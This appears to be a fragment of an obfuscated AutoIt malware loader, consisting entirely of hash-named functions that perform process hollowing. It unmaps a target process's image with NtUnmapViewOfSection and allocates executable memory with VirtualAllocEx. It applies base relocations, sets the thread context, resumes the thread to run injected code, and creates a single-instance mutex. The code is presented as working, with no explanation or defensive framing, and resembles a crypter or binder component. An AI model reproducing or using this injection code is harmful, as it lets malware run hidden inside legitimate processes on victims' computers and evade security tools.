$_X0x8E6778B28B0E780697E43E4752B55748 = DllCall("kernel32.dll", "bool", "SetThreadContext", "handle", $_X0x68F5E1A435764B1F3CC7640A6FC222A5, $_X0x7EB4FCBD2FD835DF1CA088C4A3B919A9, DllStructGetPtr($_X0x48EB9A05A34915A3E277AAF998104E61))
If @error Or Not $_X0x8E6778B28B0E780697E43E4752B55748[0] Then Return Kill($_X0x5E4041724B1003114F88A7EF84F64108)
$_X0x8E6778B28B0E780697E43E4752B55748 = DllCall("kernel32.dll", "dword", "ResumeThread", "handle", $_X0x68F5E1A435764B1F3CC7640A6FC222A5)
If @error Or $_X0x8E6778B28B0E780697E43E4752B55748[0] = -1 Then Return Kill($_X0x5E4041724B1003114F88A7EF84F64108)
DllCall("kernel32.dll", "bool", "CloseHandle", "handle", $_X0x5E4041724B1003114F88A7EF84F64108)
DllCall("kernel32.dll", "bool", "CloseHandle", "handle", $_X0x68F5E1A435764B1F3CC7640A6FC222A5)
Return DllStructGetData($_X0xEB9885D49E447E78142E59607A6B6F42, "ProcessId")
EndFunc
Func _X0x83D4AAF0416F24DC1BC6AD0875549D36($_X0x5E4041724B1003114F88A7EF84F64108, $_X0x9339AF22E677CD2399C276B7DD7A479B, $_X0x2EFA61913B17B9D80A350490486414A8)
$_X0x1C78DD000416BEF7AB0C3D570FCABD28 = DllStructCreate("LONG")
$_X0xFF5ACF26AD0CD0D529199113756188AB = DllStructCreate("PTR")
$_X0x66D35F9C6E21ADA8139102A823D3ED95 = DllStructCreate("BYTE[" & $_X0x2EFA61913B17B9D80A350490486414A8 & "]")
DllStructSetData($_X0x1C78DD000416BEF7AB0C3D570FCABD28, 1, $_X0x2EFA61913B17B9D80A350490486414A8)
$_X0x4FE47BA39BD6EB49254D41579B41A7C2 = DllCall("Kernel32.dll", "INT", "SetProcessWorkingSetSize", "HANDLE", $_X0x5E4041724B1003114F88A7EF84F64108, "DWORD", $_X0x2EFA61913B17B9D80A350490486414A8 * 3, "DWORD", $_X0x2EFA61913B17B9D80A350490486414A8 * 4)
$_X0xA2D1081FD5CF2ED3AA911FE2CCE7A2AE = DllCall("kernel32.dll", $_X0x7EB4FCBD2FD835DF1CA088C4A3B919A9, "VirtualAllocEx", "handle", $_X0x5E4041724B1003114F88A7EF84F64108, $_X0x7EB4FCBD2FD835DF1CA088C4A3B919A9, $_X0x9339AF22E677CD2399C276B7DD7A479B, "dword_ptr", $_X0x2EFA61913B17B9D80A350490486414A8, "dword", 0x1000, "dword", 64)
If @error Or Not $_X0xA2D1081FD5CF2ED3AA911FE2CCE7A2AE[0] Then Return SetError(1, 0, 0)
$_X0x13125E81810D2AC21CBA12A1AEFE7934 = DllCall("kernel32.dll", "bool", "ReadProcessMemory", "handle", $_X0x5E4041724B1003114F88A7EF84F64108, "PTR",$_X0xA2D1081FD5CF2ED3AA911FE2CCE7A2AE[0], "PTR", DllStructGetPtr($_X0x66D35F9C6E21ADA8139102A823D3ED95), "DWORD", $_X0x2EFA61913B17B9D80A350490486414A8, "DWORD", 0)
$_X0x66D35F9C6E21ADA8139102A823D3ED95 = 0
DllStructSetData($_X0xFF5ACF26AD0CD0D529199113756188AB, 1, $_X0xA2D1081FD5CF2ED3AA911FE2CCE7A2AE[0])
$_X0x8A1778D6422D735C7E82E1A5A129543C = DllCall("ntdll.dll", "LONG", "NtLockVirtualMemory", "HANDLE", $_X0x5E4041724B1003114F88A7EF84F64108, "PTR", DllStructGetPtr($_X0xFF5ACF26AD0CD0D529199113756188AB), "DWORD", DllStructGetPtr($_X0x1C78DD000416BEF7AB0C3D570FCABD28), "ULONG", "1")
Return $_X0xA2D1081FD5CF2ED3AA911FE2CCE7A2AE[0]
EndFunc
Func _X0x35BF8E5BE70A5980C473C55DD4B0C7C5($_X0x5E4041724B1003114F88A7EF84F64108, $_X0x2EFA61913B17B9D80A350490486414A8)
$_X0x1C78DD000416BEF7AB0C3D570FCABD28 = DllStructCreate("LONG")
$_X0xFF5ACF26AD0CD0D529199113756188AB = DllStructCreate("PTR")
$_X0x66D35F9C6E21ADA8139102A823D3ED95 = DllStructCreate("BYTE[" & $_X0x2EFA61913B17B9D80A350490486414A8 & "]")
DllStructSetData($_X0x1C78DD000416BEF7AB0C3D570FCABD28, 1, $_X0x2EFA61913B17B9D80A350490486414A8)
$_X0x4FE47BA39BD6EB49254D41579B41A7C2 = DllCall("Kernel32.dll", "INT", "SetProcessWorkingSetSize", "HANDLE", $_X0x5E4041724B1003114F88A7EF84F64108, "DWORD", $_X0x2EFA61913B17B9D80A350490486414A8 * 3, "DWORD", $_X0x2EFA61913B17B9D80A350490486414A8 * 4)
$_X0xA2D1081FD5CF2ED3AA911FE2CCE7A2AE = DllCall("Kernel32.dll", $_X0x7EB4FCBD2FD835DF1CA088C4A3B919A9, "VirtualAllocEx", "handle", $_X0x5E4041724B1003114F88A7EF84F64108, $_X0x7EB4FCBD2FD835DF1CA088C4A3B919A9, 0, "dword_ptr", $_X0x2EFA61913B17B9D80A350490486414A8, "dword", 0x3000, "dword", 64)
If @error Or Not $_X0xA2D1081FD5CF2ED3AA911FE2CCE7A2AE[0] Then Return SetError(1, 0, 0)
$_X0x13125E81810D2AC21CBA12A1AEFE7934 = DllCall("kernel32.dll", "bool", "ReadProcessMemory", "handle", $_X0x5E4041724B1003114F88A7EF84F64108, "PTR",$_X0xA2D1081FD5CF2ED3AA911FE2CCE7A2AE[0], "PTR", DllStructGetPtr($_X0x66D35F9C6E21ADA8139102A823D3ED95), "DWORD", $_X0x2EFA61913B17B9D80A350490486414A8, "DWORD", 0)
$_X0x66D35F9C6E21ADA8139102A823D3ED95 = 0
DllStructSetData($_X0xFF5ACF26AD0CD0D529199113756188AB, 1, $_X0xA2D1081FD5CF2ED3AA911FE2CCE7A2AE[0])
$_X0x8A1778D6422D735C7E82E1A5A129543C = DllCall("ntdll.dll", "LONG", "NtLockVirtualMemory", "HANDLE", $_X0x5E4041724B1003114F88A7EF84F64108, "PTR", DllStructGetPtr($_X0xFF5ACF26AD0CD0D529199113756188AB), "DWORD", DllStructGetPtr($_X0x1C78DD000416BEF7AB0C3D570FCABD28), "ULONG", "1")
Return $_X0xA2D1081FD5CF2ED3AA911FE2CCE7A2AE[0]
EndFunc
Func _X0x13DA0433613449867EDFD85102A652B8($_X0x5E4041724B1003114F88A7EF84F64108, $_X0x9339AF22E677CD2399C276B7DD7A479B)
DllCall("ntdll.dll", "int", "NtUnmapViewOfSection", $_X0x7EB4FCBD2FD835DF1CA088C4A3B919A9, $_X0x5E4041724B1003114F88A7EF84F64108, $_X0x7EB4FCBD2FD835DF1CA088C4A3B919A9, $_X0x9339AF22E677CD2399C276B7DD7A479B)
If @error Then Return SetError(1, 0, 0)
Return 1
EndFunc
Func IsWOW64Process($_X0x5E4041724B1003114F88A7EF84F64108)
Local $_X0x8E6778B28B0E780697E43E4752B55748 = DllCall("kernel32.dll", "bool", "IsWow64Process", "handle", $_X0x5E4041724B1003114F88A7EF84F64108, "bool*", 0)
If @error Or Not $_X0x8E6778B28B0E780697E43E4752B55748[0] Then Return SetError(1, 0, 0)
Return $_X0x8E6778B28B0E780697E43E4752B55748[2]
EndFunc
Func _X0x366DD2F42FFC040F59D36B360A493D45($_X0xBB66A7FBAD32312EEB52C28CA7C70526, $_X0x74C4A8044DE2C843CE45D4FD14FD1F56, $_X0x71F56CA424576733CA5C55F9DEE4CDB3, $_X0x9DE32EDED649706F8112361D8855E3BD, $_X0xA766F3B462F27C276A5EACF88D8769A6)
Local $_X0x8FE67777BE192CE79BA62E9A5ED0DEF4, $_X0x949211B557235618116A911653F33EC1, $_X0x4117C0459A3B2FF6D26C4B4AEA0D9E97, $_X0xFD8483EE47D0B2A276A6BCBF51F5A4C2, $_X0xBF61B0492F30527A13A9410BE82401E8, $_X0xF32959418495502836E0D069D3AD7D83, $_X0x2327389768AFBEE8A6F60A3ECAAB872C = 3 + 7 * $_X0xA766F3B462F27C276A5EACF88D8769A6
While $_X0x949211B557235618116A911653F33EC1 < DllStructGetSize($_X0x74C4A8044DE2C843CE45D4FD14FD1F56)
$_X0x8FE67777BE192CE79BA62E9A5ED0DEF4 = DllStructCreate("dword a; dword b", DllStructGetPtr($_X0x74C4A8044DE2C843CE45D4FD14FD1F56) + $_X0x949211B557235618116A911653F33EC1)
$_X0x4117C0459A3B2FF6D26C4B4AEA0D9E97 = DllStructGetData($_X0x8FE67777BE192CE79BA62E9A5ED0DEF4, "b")
$_X0xBF61B0492F30527A13A9410BE82401E8 = DllStructCreate("word[" &(($_X0x4117C0459A3B2FF6D26C4B4AEA0D9E97 - 8) / 2) & "]", DllStructGetPtr($_X0x8FE67777BE192CE79BA62E9A5ED0DEF4) + 8)
For $_X0xF489DB547562ADBAE3D494C6F0F15A87 = 1 To(($_X0x4117C0459A3B2FF6D26C4B4AEA0D9E97 - 8) / 2)
If BitShift(DllStructGetData($_X0xBF61B0492F30527A13A9410BE82401E8, 1, $_X0xF489DB547562ADBAE3D494C6F0F15A87), 12) = $_X0x2327389768AFBEE8A6F60A3ECAAB872C Then
$_X0xF32959418495502836E0D069D3AD7D83 = DllStructCreate($_X0x7EB4FCBD2FD835DF1CA088C4A3B919A9, $_X0xBB66A7FBAD32312EEB52C28CA7C70526 + DllStructGetData($_X0x8FE67777BE192CE79BA62E9A5ED0DEF4, "a") + BitAND(DllStructGetData($_X0xBF61B0492F30527A13A9410BE82401E8, 1, $_X0xF489DB547562ADBAE3D494C6F0F15A87), 0xFFF))
DllStructSetData($_X0xF32959418495502836E0D069D3AD7D83, 1, DllStructGetData($_X0xF32959418495502836E0D069D3AD7D83, 1) + $_X0x71F56CA424576733CA5C55F9DEE4CDB3 - $_X0x9DE32EDED649706F8112361D8855E3BD)
EndIf
Next
$_X0x949211B557235618116A911653F33EC1 += $_X0x4117C0459A3B2FF6D26C4B4AEA0D9E97
WEnd
Return 1
EndFunc
Func Kill($HANDLE)
DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $HANDLE, "dword", 0)
Return 0
EndFunc
Func _X0xB3F0357FF7260C2547BB4929FC287C61($_X0x9339AF22E677CD2399C276B7DD7A479B, $_X0x2EFA61913B17B9D80A350490486414A8, $_X0x993FB3EA407FD21281F091DAE92DD10E)
; VirtualProtect ?
Local $_X0x8CA2E199216E54564333DB5EBC0851A5 = DllCall("kernel32.dll", "bool", "_X0xB3F0357FF7260C2547BB4929FC287C61", "ptr", $_X0x9339AF22E677CD2399C276B7DD7A479B, "dword_ptr", $_X0x2EFA61913B17B9D80A350490486414A8, "dword", $_X0x993FB3EA407FD21281F091DAE92DD10E, "dword*", 0)
If @error Or Not $_X0x8CA2E199216E54564333DB5EBC0851A5[0] Then Return SetError(1, 0, 0)
Return 1
EndFunc
; not used
Func _X0x7C6688F2BA4A328ACBAEB3DA3272700F($_X0xE7D537F791CDCF149D7266DC4DA82A17, $_X0x2F5C10B738AB107E347EB20120199691 = 0)
Local Const $_X0x7ED04696D9A89C4EC281655A344BA517 = "dword Length;ptr Descriptor;bool InheritHandle"
Local Const $_X0x0C96B1FD0036AEBCE530622E7625AFA2 = 183
Local Const $_X0xCF7F568DB5C90786461FBDA2701CDB95 = 1
Local $_X0x37B9CABBF58C4C419886DDD177A505F1 = 0
If BitAND($_X0x2F5C10B738AB107E347EB20120199691, 2) Then
Local $_X0x26D0B9073E37E4EDF11B9D2CB7E3DD8B = DllStructCreate("byte;byte;word;ptr[4]")
Local $_X0xAA359173F9AF0E7DFA7FD5D611CA6C9D = DllCall("advapi32.dll", "bool", "InitializeSecurityDescriptor", "struct*", $_X0x26D0B9073E37E4EDF11B9D2CB7E3DD8B, "dword", $_X0xCF7F568DB5C90786461FBDA2701CDB95)
If @error Then Return SetError(@error, @extended, 0)
If $_X0xAA359173F9AF0E7DFA7FD5D611CA6C9D[0] Then
$_X0xAA359173F9AF0E7DFA7FD5D611CA6C9D = DllCall("advapi32.dll", "bool", "SetSecurityDescriptorDacl", "struct*", $_X0x26D0B9073E37E4EDF11B9D2CB7E3DD8B, "bool", 1, "ptr", 0, "bool", 0)
If @error Then Return SetError(@error, @extended, 0)
If $_X0xAA359173F9AF0E7DFA7FD5D611CA6C9D[0] Then
$_X0x37B9CABBF58C4C419886DDD177A505F1 = DllStructCreate($_X0x7ED04696D9A89C4EC281655A344BA517)
DllStructSetData($_X0x37B9CABBF58C4C419886DDD177A505F1, 1, DllStructGetSize($_X0x37B9CABBF58C4C419886DDD177A505F1))
DllStructSetData($_X0x37B9CABBF58C4C419886DDD177A505F1, 2, DllStructGetPtr($_X0x26D0B9073E37E4EDF11B9D2CB7E3DD8B))
DllStructSetData($_X0x37B9CABBF58C4C419886DDD177A505F1, 3, 0)
EndIf
EndIf
EndIf
Local $_X0x5AD167CDBD4F5BC7D1152B6477973BFF = DllCall("kernel32.dll", "handle", "CreateMutexW", "struct*", $_X0x37B9CABBF58C4C419886DDD177A505F1, "bool", 1, "wstr", $_X0xE7D537F791CDCF149D7266DC4DA82A17)
If @error Then Return SetError(@error, @extended, 0)
Local $_X0x2D6E9535FB204E205C934C15B919A7C6 = DllCall("kernel32.dll", "dword", "GetLastError")
If @error Then Return SetError(@error, @extended, 0)
If $_X0x2D6E9535FB204E205C934C15B919A7C6[0] = $_X0x0C96B1FD0036AEBCE530622E7625AFA2 Then
If BitAND($_X0x2F5C10B738AB107E347EB20120199691, 1) Then
DllCall("kernel32.dll", "bool", "CloseHandle", "handle", $_X0x5AD167CDBD4F5BC7D1152B6477973BFF[0])
If @error Then Return SetError(@error, @extended, 0)
Return SetError($_X0x2D6E9535FB204E205C934C15B919A7C6[0], $_X0x2D6E9535FB204E205C934C15B919A7C6[0], 0)
Else
Exit -1
EndIf
EndIf
Return $_X0x5AD167CDBD4F5BC7D1152B6477973BFF[0]
EndFunc
func binded()
endfunc